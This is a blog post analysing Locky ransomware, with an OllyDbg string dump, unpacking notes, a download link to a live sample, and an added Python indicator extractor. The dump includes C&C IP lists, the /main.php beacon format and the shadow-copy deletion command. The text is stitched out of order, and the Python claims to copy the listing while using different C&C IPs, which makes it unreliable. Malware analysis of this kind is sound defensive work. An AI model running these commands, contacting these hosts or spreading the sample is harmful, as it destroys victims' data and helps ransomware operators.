<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403F9B MOV ECX,Dumped.00413B80 ASCII "TileWallpaper"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00403FE6 MOV EDI,Dumped.00413B90 UNICODE "open"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004040A9 PUSH Dumped.00413CC4 ASCII "Wow64DisableWow64FsRedirection"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004040AE PUSH Dumped.00413CE4 ASCII "kernel32.dll"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004040DA MOV ESI,Dumped.004137EF ASCII "185.92.220.35,46.108.39.18,192.71.213.69,192.121.16.196,109.237.111.168,212.47.223.19,89.108.85.163"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004041E3 PUSH Dumped.00413B9C ASCII "Software\Locky"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040422D PUSH Dumped.00413BAC ASCII "id"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404288 MOV EBX,Dumped.00413BB0 ASCII "pubkey"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004042E2 PUSH Dumped.00413BB8 ASCII "paytext"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404355 PUSH Dumped.00413BC0 ASCII "completed"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004043ED PUSH Dumped.00413BCC UNICODE "svchost.exe"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040448A MOV ECX,Dumped.00413BAC ASCII "id"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004044E1 PUSH Dumped.00413BE4 UNICODE ":Zone.Identifier"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004045C6 PUSH Dumped.004139BC ASCII "id="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004045DC PUSH Dumped.00413C08 ASCII "&act=gettext&lang="</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040468D PUSH Dumped.00413BB8 ASCII "paytext"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004047B5 PUSH Dumped.00413C20 UNICODE "vssadmin.exe Delete Shadows /All /Quiet"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004047E2 PUSH Dumped.00413C70 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040486B PUSH Dumped.00413BC0 ASCII "completed"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004048AD PUSH Dumped.00413CAC ASCII "Locky"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404993 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404A78 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404EE1 PUSH Dumped.00413CA0 UNICODE "Locky"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404F81 PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00404FA0 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00405041 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004050BB PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004051B4 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00405409 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004055C2 PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040563A PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004057E6 PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00405AAC MOV EDX,Dumped.00413CB4 UNICODE "/\"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00406393 MOV EDX,Dumped.00413CB4 UNICODE "/\"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004064A2 PUSH Dumped.00413D0C UNICODE "cmd.exe /C del /Q /F ""</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004064DE PUSH Dumped.00413D04 UNICODE "sys"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004069CA PUSH Dumped.00413D50 ASCII "HTTP/1.1"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004069D6 PUSH Dumped.00413D8C ASCII "POST"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004071D5 PUSH Dumped.00413D84 ASCII "http://"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004071E5 PUSH Dumped.00413D78 ASCII "/main.php"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040753F PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040759C PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040778B PUSH Dumped.00413918 ASCII "string too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004078CA PUSH Dumped.00413928 ASCII "invalid string position"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407CBA PUSH Dumped.004147A0 UNICODE "\*"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004087B9 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040880F PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408866 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004088C6 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">004089C4 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408AC0 PUSH Dumped.00413904 ASCII "vector&lt;T&gt; too long"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00409CF7 MOV EAX,Dumped.00411344 ASCII "Unknown exception"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">00409E56 MOV DWORD PTR SS:[EBP-4],Dumped.004138B4 ASCII "bad allocation"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040AB74 CALL Dumped.0040D1F9 (Initial CPU selection)</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040ADAC PUSH Dumped.00411D44 UNICODE "Runtime Error!</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">Program: "</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040ADED PUSH Dumped.00411D14 UNICODE "&lt;program name unknown&gt;"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040AE2E PUSH Dumped.00411D0C UNICODE "..."</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040AE43 PUSH Dumped.00411D04 UNICODE "</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040AE74 PUSH Dumped.00411CB8 UNICODE "Microsoft Visual C++ Runtime Library"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040B4F9 PUSH Dumped.00411D88 UNICODE "mscoree.dll"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040B508 PUSH Dumped.00411D78 ASCII "CorExitProcess"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C47C PUSH Dumped.004120F0 UNICODE "KERNEL32.DLL"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C6E9 PUSH Dumped.004120F0 UNICODE "KERNEL32.DLL"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C70A PUSH Dumped.0041212C ASCII "FlsAlloc"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C712 PUSH Dumped.00412120 ASCII "FlsGetValue"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C71F PUSH Dumped.00412114 ASCII "FlsSetValue"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040C72C PUSH Dumped.0041210C ASCII "FlsFree"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D7DD PUSH Dumped.004129E8 UNICODE "USER32.DLL"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D7F8 PUSH Dumped.004129DC ASCII "MessageBoxW"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D811 PUSH Dumped.004129CC ASCII "GetActiveWindow"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D821 PUSH Dumped.004129B8 ASCII "GetLastActivePopup"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D831 PUSH Dumped.0041299C ASCII "GetUserObjectInformationW"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040D84A PUSH Dumped.00412984 ASCII "GetProcessWindowStation"</span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;"></span><br />
<span style="color: #222222; font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040FD27 MOV DWORD PTR SS:[EBP+8],Dumped.004147BC ASCII "bad exception"</span><br />
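<span style="font-family: "arial" , "helvetica" , sans-serif;">The listing above is OllyDbg's "Text strings referenced" output for the dumped Locky binary. Most of it is MSVC runtime noise ("string too long", "bad allocation"), but a handful of strings are the operational core: the comma-separated C&C IP list, the <code>/main.php</code> path with its <code>act=getkey</code> / <code>act=stats</code> / <code>act=gettext</code> parameters, the <code>Software\Locky</code> registry key, the <code>.locky</code> extension, the ransom-note file names and the shadow-copy deletion command. The Python below is an added example, not code from the post or from any tool it mentions: it parses lines in that listing format into a small indicator set and then applies it to a few constructed proxy log lines. The log format, client addresses, timestamps and request bodies are assumptions made for the demo; only the indicator strings themselves come from the listing.</span><br />

```python
"""Added example (not from the original post): turn an OllyDbg string-reference
listing into defensive indicators and run them over constructed proxy log lines."""
import re
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Lines copied from the "Text strings referenced in Dumped:.text" listing above.
LISTING = r"""
00401DF0 PUSH Dumped.004138F4 UNICODE ".locky"
00402607 PUSH Dumped.00413918 ASCII "string too long"
00402D2E ASCII "L~",0
00403174 PUSH Dumped.00413940 UNICODE "\_Locky_recover_instructions.txt"
00403281 PUSH Dumped.004139A8 ASCII "&act=stats&path="
0040377E PUSH Dumped.00413AF4 ASCII "&act=getkey&affid="
004040DA MOV ESI,Dumped.004137EF ASCII "188.138.88.184,31.184.197.119,51.254.19.227,5.34.183.195,185.14.29.188"
004041E3 PUSH Dumped.00413B9C ASCII "Software\Locky"
004045DC PUSH Dumped.00413C08 ASCII "&act=gettext&lang="
004047B5 PUSH Dumped.00413C20 UNICODE "vssadmin.exe Delete Shadows /All /Quiet"
004047E2 PUSH Dumped.00413C70 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
004071E5 PUSH Dumped.00413D78 ASCII "/main.php"
"""

# One OllyDbg line: address, optional disassembly, encoding, quoted string, optional ",0".
LINE_RE = re.compile(
    r'^(?P<addr>[0-9A-F]{8})\s+(?:(?P<disasm>.*?)\s+)?'
    r'(?P<enc>ASCII|UNICODE)\s+"(?P<text>.*)"(?:,0)?$')
IPV4 = r'\d{1,3}(?:\.\d{1,3}){3}'
IP_LIST_RE = re.compile(rf'^{IPV4}(?:,{IPV4})*$')


def parse_listing(listing):
    """Yield (address, encoding, text) for each string-reference line."""
    for line in listing.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group('addr'), m.group('enc'), m.group('text')


def extract_iocs(listing):
    """Sort referenced strings into indicator buckets; runtime noise is dropped."""
    iocs = {'c2_ips': [], 'c2_paths': [], 'c2_actions': [], 'registry_keys': [],
            'commands': [], 'extensions': [], 'ransom_notes': []}
    for _addr, _enc, text in parse_listing(listing):
        act = re.search(r'act=(\w+)', text)
        if IP_LIST_RE.match(text):                      # hard-coded C&C address list
            iocs['c2_ips'] += [str(ip_address(p)) for p in text.split(',')]
        elif text.startswith('/') and text.endswith('.php'):
            iocs['c2_paths'].append(text)               # C&C request path
        elif act:
            iocs['c2_actions'].append(act.group(1))     # POST body "act" values
        elif text.startswith('Software\\'):
            iocs['registry_keys'].append(text)          # persistence / state keys
        elif 'vssadmin' in text.lower():
            iocs['commands'].append(text)               # shadow-copy deletion
        elif 'recover_instructions' in text:
            iocs['ransom_notes'].append(text.lstrip('\\'))
        elif re.fullmatch(r'\.[a-z0-9]{1,5}', text):
            iocs['extensions'].append(text)             # encrypted-file extension
    return iocs


# Constructed proxy log (assumed format: timestamp client method url "post-body").
# Only the first host is in the hard-coded list; the third request reuses the
# beacon shape from an address that is not.
PROXY_LOG = r'''
2016-03-02T11:40:01 10.0.0.5 POST http://188.138.88.184/main.php "id=0123456789ABCDEF&act=getkey&affid=3&lang=es&corp=0&serv=0&os=Windows 7&sp=1&x64=0"
2016-03-02T11:40:05 10.0.0.7 GET http://www.example.com/index.php ""
2016-03-02T11:52:13 10.0.0.5 POST http://203.0.113.9/main.php "id=0123456789ABCDEF&act=stats&path=C:\Users&encrypted=120&failed=0&length=4096"
2016-03-02T11:53:00 10.0.0.9 POST http://www.example.com/main.php "user=bob&act=login"
'''
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "(?P<body>.*)"$')


def flag_beacons(log, iocs):
    """Return (timestamp, client, reason) for requests matching the C&C profile."""
    hits = []
    for line in log.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        url = urlsplit(m.group('url'))
        body = parse_qs(m.group('body'))
        acts = body.get('act', [])
        if url.hostname in iocs['c2_ips']:
            hits.append((m.group('ts'), m.group('client'), 'known C&C IP ' + url.hostname))
        elif (m.group('method') == 'POST' and url.path in iocs['c2_paths']
              and 'id' in body and any(a in iocs['c2_actions'] for a in acts)):
            hits.append((m.group('ts'), m.group('client'), 'C&C URI pattern act=' + acts[0]))
    return hits


if __name__ == '__main__':
    found = extract_iocs(LISTING)
    for bucket, values in found.items():
        print(f'{bucket}: {values}')
    for hit in flag_beacons(PROXY_LOG, found):
        print('ALERT', *hit)
```

<span style="font-family: "arial" , "helvetica" , sans-serif;">The URI-pattern rule is what catches the third request even though its host is not in the hard-coded list; matching on the shape of the beacon (POST to <code>/main.php</code> with an <code>id=</code> and one of the known <code>act=</code> values) rather than on addresses alone is the point of the second rule. The IP list, registry keys and the vssadmin command line feed straight into egress block lists and endpoint telemetry searches.</span><br />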
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;">Communication with the C&C site</span><br />
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="color: #222222; font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9BKsNorJhH8PJ3PknAa4b1S4QgUcwLS8gutZmXvHSsd57mjIzNAwXxKLC7w1o4AeBlYRjqSUfUG3-fKBk2TrYVtYbVsRAaOv6Pom8MDewd-p99hhILhppIJBlWwObVI5frSFSvWvbg0c/s1600/004.jpg" imageanchor="1"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9BKsNorJhH8PJ3PknAa4b1S4QgUcwLS8gutZmXvHSsd57mjIzNAwXxKLC7w1o4AeBlYRjqSUfUG3-fKBk2TrYVtYbVsRAaOv6Pom8MDewd-p99hhILhppIJBlWwObVI5frSFSvWvbg0c/s640/004.jpg" width="640" /></a></span><br />
<br />
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Encrypted PC</span><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTkMxN_gdEi7ui-d1tsTys1GnpwEfG3_wLi9yGMWkOD9zI5vchpeJ6m0ZMaY3UfALZU3cSUgj_6Bqi8iFNd07OFXmSS8xRREgu1MRX0LJEb5uuOtBFB7V95uhg-C1qcT6CD1hHnl2ulns/s1600/005.jpg" imageanchor="1"><img border="0" height="493" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTkMxN_gdEi7ui-d1tsTys1GnpwEfG3_wLi9yGMWkOD9zI5vchpeJ6m0ZMaY3UfALZU3cSUgj_6Bqi8iFNd07OFXmSS8xRREgu1MRX0LJEb5uuOtBFB7V95uhg-C1qcT6CD1hHnl2ulns/s640/005.jpg" width="640" /></a><br />
<br />
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Shell on the compromised site hosting the ransomware.</span><br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlD0zz_07a3LIKcorpqrC8cerDfNZ2jJ8_l9kuuLYmh2exfckJYmuoEhyjZdD-Qe2136QBvMxyP67YsyiDD74iJPh3TBK1LO5Q-HkKRCRiZFW8mp92OrllXBjBj6W8V2i-9WYg5NtOBKU/s1600/003.jpg" imageanchor="1"><img border="0" height="417" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlD0zz_07a3LIKcorpqrC8cerDfNZ2jJ8_l9kuuLYmh2exfckJYmuoEhyjZdD-Qe2136QBvMxyP67YsyiDD74iJPh3TBK1LO5Q-HkKRCRiZFW8mp92OrllXBjBj6W8V2i-9WYg5NtOBKU/s640/003.jpg" width="640" /></a><br />
<br />
<br />
<br />
Sample: https://www.dropbox.com/s/t4x9i8xu3up8zw4/Locky-07-03-16.rar?dl=0<br />
<br />
<br />
<span style="background-color: #fefdfa; color: #333333; font-family: "arial" , "helvetica" , sans-serif; font-size: 13px; line-height: 18.2px;">That's all for now. @Dkavalanche 2016</span><br />
<br />
<br />@Dkavalanche, 2016-03-02<br /><span style="background-color: #fefdfa; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;"><b>Ransomware Campaign: Locky</b></span><br />
<div style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2px;">
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2px;"><br /></span></span></div>
<div style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2px;">
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2px;"><br /></span></span></div>
<div style="background-color: #fefdfa;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: #333333; font-size: 13px; line-height: 18.2px;">My friend <a href="https://twitter.com/rfb_/status/704738520208957440" style="color: #333333; font-size: 13px; line-height: 18.2px;">Raul</a> sent me a sample of this ransomware, which is hitting thousands of computers around the world. As usual, it arrives in unsolicited e-mail as a .zip attachment with an obfuscated JavaScript file inside.</span></span></div>
<div style="background-color: #fefdfa;">
<div style="color: #333333; font-size: 13px; line-height: 18.2px;">
<span style="color: #222222;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;">Emailing: MX62EDO 01.03.2016</span></span></div>
<div style="text-align: center;">
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7sam8bE_Z3G8WXXgaIdv9pKTyWSonJzLBwRyXlsU19p85OFUX9_WaYQLR-Tp7k9hP_OvS-NFq6sFMa685bXmm9dmQY3gTFBejLuOV47IAkCYnCYWw9d-qAiIJDWRHkVKS9JsQuPNdwCE/s1600/TW.jpg" imageanchor="1"><img border="0" height="315" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7sam8bE_Z3G8WXXgaIdv9pKTyWSonJzLBwRyXlsU19p85OFUX9_WaYQLR-Tp7k9hP_OvS-NFq6sFMa685bXmm9dmQY3gTFBejLuOV47IAkCYnCYWw9d-qAiIJDWRHkVKS9JsQuPNdwCE/s400/TW.jpg" width="400" /></a></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 18.2px;">When Raúl alerted me, VirusTotal showed it detected by only 3 of 55 antivirus engines; it is now detected by 33.</span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-COTa9ijzHUMdJD4Is4vnePBNlwyUIdjtBfvopDgt1n269AGeHQUHh47noufHdV9qdPFowxT3zRZ4MK-jtj4dTnE96sFHCH8jk04s1vmLaAZ1tvCWm2NMNhEOomJ6g3Z24tj7ZO2F1aQ/s1600/VT.jpg" imageanchor="1"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-COTa9ijzHUMdJD4Is4vnePBNlwyUIdjtBfvopDgt1n269AGeHQUHh47noufHdV9qdPFowxT3zRZ4MK-jtj4dTnE96sFHCH8jk04s1vmLaAZ1tvCWm2NMNhEOomJ6g3Z24tj7ZO2F1aQ/s640/VT.jpg" width="640" /></a></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;">Icon of the threat once the .js has been executed:</span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: center;">
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5xiwst78rUBKtuuK02EWDh0RDzpeG26aIaCsTs0-iTR6x6WE-u9SmO41gDLOt_1cud8o7H10v4qyzaIAMxPP213jviO1OWyPZ8uHTBaa1N7yb1w5z4WT3Ed4Fae8o3oKR4Y9aeUz0BFk/s1600/00.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5xiwst78rUBKtuuK02EWDh0RDzpeG26aIaCsTs0-iTR6x6WE-u9SmO41gDLOt_1cud8o7H10v4qyzaIAMxPP213jviO1OWyPZ8uHTBaa1N7yb1w5z4WT3Ed4Fae8o3oKR4Y9aeUz0BFk/s1600/00.jpg" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">The crypter layer is easy to strip with a breakpoint on ResumeThread, after which we dump the process with PETools.</span></div>
<div style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgef1LYBuRfjr-7vOBfIlQogcWo6jmhiVy-ZzGu3k2cLT1w8_j4odzilZBAEeqVwOf4mBx9e75l4TKJfZ95_nZQuob6yhXesRRQEOU8Gd5ZhYiDT_fQ4-dJgObBEmoIX6Ird2mY0-4sqKw/s1600/02.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgef1LYBuRfjr-7vOBfIlQogcWo6jmhiVy-ZzGu3k2cLT1w8_j4odzilZBAEeqVwOf4mBx9e75l4TKJfZ95_nZQuob6yhXesRRQEOU8Gd5ZhYiDT_fQ4-dJgObBEmoIX6Ird2mY0-4sqKw/s1600/02.jpg" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM-SL3628JdYQWHnYGe54FfvFzEFG-eGup-2TWoLC0GiB22IN0opp52Rv6X9mn0eSpVuumD-JBQrNllP7Rn3IP85tEnMUX9Q80jpg11xGGyzVlcFs4WLoBmhVRkFF67UEol1PhinZJICQ/s1600/01.jpg" imageanchor="1"><img border="0" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM-SL3628JdYQWHnYGe54FfvFzEFG-eGup-2TWoLC0GiB22IN0opp52Rv6X9mn0eSpVuumD-JBQrNllP7Rn3IP85tEnMUX9Q80jpg11xGGyzVlcFs4WLoBmhVRkFF67UEol1PhinZJICQ/s640/01.jpg" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Interesting Strings</b></span></div>
<div style="text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Text strings referenced in Dumped:.text</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Address Disassembly Text string</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004019CA MOV DWORD PTR SS:[EBP-4],Dumped.004138B4 ASCII "bad allocation"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401B09 PUSH Dumped.004138D0 UNICODE "0123456789ABCDEF"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401B78 PUSH Dumped.004138C4 UNICODE ".tmp"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401D8D PUSH Dumped.004138D0 UNICODE "0123456789ABCDEF"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401DF0 PUSH Dumped.004138F4 UNICODE ".locky"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040253B PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040255A PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402607 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402687 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
